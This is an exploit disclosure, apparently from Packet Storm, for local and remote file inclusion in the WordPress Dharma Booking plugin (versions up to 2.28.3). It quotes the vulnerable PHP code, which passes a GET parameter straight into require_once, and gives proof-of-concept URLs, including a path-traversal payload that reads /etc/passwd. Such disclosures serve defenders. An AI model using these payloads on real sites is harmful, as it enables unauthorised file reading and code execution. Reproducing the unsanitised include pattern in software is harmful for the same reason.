WordPress Dharma Booking plugin versions 2.28.3 and below suffer from local and remote file inclusion vulnerabilities.
82526a805b6d2b7b16345894f9995542ea3661ae96f70e63be274799a3089476# Exploit Title: Wordpress Dharma booking File Inclusion
# Date: 03/22/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage:https://wordpress.org/plugins/dharma-booking/
<https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>Software
Link : https://wordpress.org/plugins/dharma-booking/
# Version: <=2.28.3
# Tested on: WINDOWS/WAMP
dharma-booking/frontend/ajax/gateways/proccess.php's code:
<?php
include_once('../../../../../../wp-config.php');
$settings = get_option('Dharma_Vars');
echo $settings['paymentAccount']. $settings['gatewayid'];
require_once($_GET['gateway'].'.php');
//
POC:
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed